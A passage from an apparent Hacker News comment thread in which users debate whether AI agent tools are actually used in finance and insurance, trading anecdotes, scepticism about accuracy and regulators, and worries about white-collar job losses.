Nowhere near self sufficient tools though, just great to answer questions over the data that would usually take a few hours of custom scripting/excel. I wouldn't trust our stakeholders using AI directly either, being frank.
timbaboon17 hours ago
Seen it used in some of the fraud models (I work in insurance). So that's both from the perspective of people trying to claim fraudulently and from suppliers over charging. I can't say how much of a lift we actually get vs existing ML models
[deleted]13 hours agocollapsed
iewjj17 hours ago
Nope If anything firms are pulling back (I know someone closely who works at blackrock).
semiquaver17 hours ago
I don’t just know someone who works in finance, I am someone who works in finance and I say you’re wrong.
iewjj17 hours ago
[flagged]
infecto17 hours ago
Let’s state the obvious. You have an account that was just created. Are posting specific details internal to a company with what is typically a biased area. And now throwing vulgarities out. No credibility.
iewjj17 hours ago
Don’t really care fella. If you don’t believe it screenshot my posts and revisit in 6 months.
I’d put money behind what I say, would you?
[deleted]17 hours agocollapsed
kx_x9 hours ago
In what context?
For research and theses evaluations, we're observing that firms - of names we all know - are bullish and even eager to try AI products.
Regarding automated asset management and the likes, indeed there's much more apprehension.
biophysboy17 hours ago
pulling back as in setting more realistic token budgets, or something more drastic? I'm curious
iewjj17 hours ago
Stopped using them altogether in the context of productivity - in essence they’re useless.
roughly17 hours ago
I can believe that. Gambler’s Ruin gets costly when you’ve actually got money on the line.
TacticalCoder13 hours ago
> For those in the finance space, are you actually seeing any real AI tools being used? Like for actual operational tasks?
> I've really only seen it used for research / exploration thus far
Summaries and translation for sure.
Speaking with devs in the field I know that AI tools are used to summarize and extract data from... PDFs. Now, thankfully, LLMs got better at answering "How many 'r' in 'strawberry" and it looks like they're good enough for summarizing PDFs and extracting key numbers but I'd still be cautious.
And I've got a friend who's a translator specifically for financial documents: she's a contractor and getting about 1/10th of the work (and 1/10th of the pay) she used to have for now she's only tasked to verify that the translations are correct. Of course she already had lots of tools, way before he LLM era, automating some of her work but she was still billing he use of those tools. Now LLMs are doing nearly all the work and not "for her": it's happening upstream and she only gets the output of the LLMs and has to verify them. And there aren't that many errors.
apaprocki16 hours ago
We’re integrating AI tooling into the Bloomberg Terminal for everyone to use.
https://www.bloomberg.com/professional/insights/press-announ...
jcims13 hours ago
This is great but as someone in infrastructure tech at a large financial, there is almost no framework for cleanly separating control from data plane operations, read vs write, anything. As of right now you have to build nearly all of that yourself.
It feels like juggling pipe bombs and I have a ton of empathy for the teams being pressured by the business to roll them out with no appreciation for the regulatory rat's nest that ensues.
botacode14 hours ago
Great to see more insurance hype! We've been working on AI to solve the consumer search problem in the industry for the past 3 (almost 4) years and it's great to see the big labs getting their hands dirty and building tools for practitioners in the space.
More industry exposure to well-managed agentic experiences will create oodles of opportunities to reduce premiums for consumers and offput some inflation-driven increases in cost of coverage.
[deleted]16 hours agocollapsed
BrandiATMuhkuh13 hours ago
we tried it just before. it's interesting what it does. writing lots of python scripts.
however the result (excel/spreadsheet) looks different each time you run it. Which is annoying when you run it at the end of each month.
btw: this is not surprising when you look at the low details the skills have.
dkersten14 hours ago
Given the quality of Claude code lately, I wouldn’t trust them in financial services.
0123456789ABCDE17 hours ago
patagonia is gonna to lose some clientele
KellyCriterion15 hours ago
haha, insider! :-D
Just yesterday I told a colleague that he should by some of their vests for his company :-D
HyperL0gi9 hours ago
Anyone still use claude design? I’ve not seen any mentions on X, here or youtube recently, so wonder if it was all hype or people are actually using it.
traceroute6615 hours ago
I stopped reading at paragraph one:
"ready-to-run agent templates for the most time-consuming work in financial services: building pitchbooks, screening KYC files, and closing the books at month-end"
Ok, maybe you can squeeze a vaguely passable pitchbook out of Claude.
But screening KYC files or closing books at month-end ?
"I'll have some of what they're smoking" as the cool kids say.
No regulator or tax office on this planet is going to accept the "but Claude said it was ok" excuse.
The only people who are going to profit out of this are Anthropic, Lawyers and Governments (through increased fines).
Lio15 hours ago
Wow, really going for those white collar jobs. This is going to be an interesting few years.
scottyah9 hours ago
Just a natural rebalancing of the Rise of the Laptop Class. I think we'll get more productive as the white collar jobs become more efficient, and less days with 8hrs of meetings and responding to emails from people too lazy to look information up themselves.
23dsfds9 hours ago
What will happen is what has happened for the past few years: mostly nothing. People employed, things keep trucking forward.
LLMs do not change the equation all that much: human's ability to imagine is the most scarce resource on the planet and LLMs will not help all that much with it.
jqpabc12317 hours ago
AI and finance --- what could possibly go wrong?
Better Call Saul when (not if) it does.
Ekaros15 hours ago
Well at that point you can use AI as legal help, right?
jqpabc1237 hours ago
Yes, you can. But expect similar results.
https://www.lawnext.com/2025/05/ai-hallucinations-strike-aga...
sharadov16 hours ago
Next couple weeks - financial and insurance services announce layoffs!
KellyCriterion15 hours ago
There was a paper lately, claiming that bank & insurances are going to layoff around 200k in the next years globally. (which would be according to them a reduction of 3-4% of finance people)
sovenyr4 hours ago
this is to risky as for me!
prosunpraiser14 hours ago
Of course - finance is the best domain to depkiy a stochastic parrot which hallucinates and forgets stuff frequently and doesn’t follow your instructions - even with SOTA models. One where you need absolute accuracy and auditabikity.
Why didn’t I think of that.
throwpoaster14 hours ago
Because the l on your keyboard is broken?
vatsachak17 hours ago
Everything is going to be slop and you're going like it.
Is the plan to have an LLM do everything? And do it worse?
"Oh yeah my Claude didn't agree with the pitch from their Claude"
The goal of current tech is to make humanity a gerbil running on a Claude wheel
soupspaces5 hours ago
Follow the money, until you can't (compute credits)
nothinkjustai17 hours ago
At that point what even is the point of doing anything at all? Like, it’s less than useless.
vatsachak15 hours ago
That is what people like Thiel actually believe, that humanity is just a cradle to bring about a machine god.
I don't necessarily disagree with that but doing it through LinkedIn slop companies? Come on man you know better than that
simianwords14 hours ago
Does anyone else think "agents" are the wrong abstractions? Agents look like UI wrappers over LLM's - they are inherently not composable. Tailor made agents for UI's don't seem to scale. I predict they wont take off.
What I predict instead is that we will have a common UI layer plugin and a "protocol" than can speak to ui elements -- this might be more composable.
guluarte14 hours ago
How long until Anthropic or OpenAI builds an interview platform around AI tools, where candidates build a feature end to end using AI?
As someone who has been interviewing lately, I think this is the next step after leetcode and whiteboard style interviews.
dakolli16 hours ago
Why would this be useful in a zero sum environment like markets, why would you want to use the same tool that everyone else has access too? Top performers will always be the people that hand craft their solutions, just like why the top performers in the watch space are the people that make handmade watches in Switzerland not the guys make 100k watches a month in China.
codemog17 hours ago
Making the most convoluted and idiotic insurance process on earth and then delegating that process onto an AI that requires huge buzzing data centers.. Is there an option to respawn in the non-clown world universe? It was funny at first but it gets tiring eventually.
jeffreyrogers14 hours ago
What does a better insurance process look like? Outside of health insurance, which is complicated for a variety of reasons, most insurance is pretty easy to procure. I got an umbrella policy recently and it took about 30 minutes of talking with an agent and answering pretty reasonable questions.
codemog13 hours ago
1. A better insurance process is clearly out of the scope of a hn comment, and I have trouble believing you don’t know that too.
2. I’m almost certainly talking about health insurance, made obvious by you even mentioning that. There’s a HN guideline about discussing in good faith.
3. I find it humorous you hand-wave away our inhuman healthcare system as “for a variety of reasons”.
4. I see your career is in hedge funds, defense, and big tech. Best of luck ;)
jeffreyrogers12 hours ago
I don't think it's obvious that you were talking about health insurance, which I consider fairly distinct from property, casualty, liability, and life insurance, which are all quite large markets in themselves. The reason I made a distinction is because health insurance is quite different from other lines of insurance because healthcare is federally regulated while other insurance is regulated at the state level.
As mentioned the problems with the US healthcare system are numerous, complex, and interrelated. I don't think they have a simple solution, nor do I think they are insurance problems at their core. For example the cost of drugs in the US vs the rest of the world has very little to do with insurance.
[deleted]16 hours agocollapsed
ramchella12 hours ago
[flagged]
lpcvoidan hour ago
[dead]
thepitstop_ai11 hours ago
[dead]
dk97011 hours ago
[flagged]
axiosgunnar17 hours ago
[dead]
[deleted]13 hours agocollapsed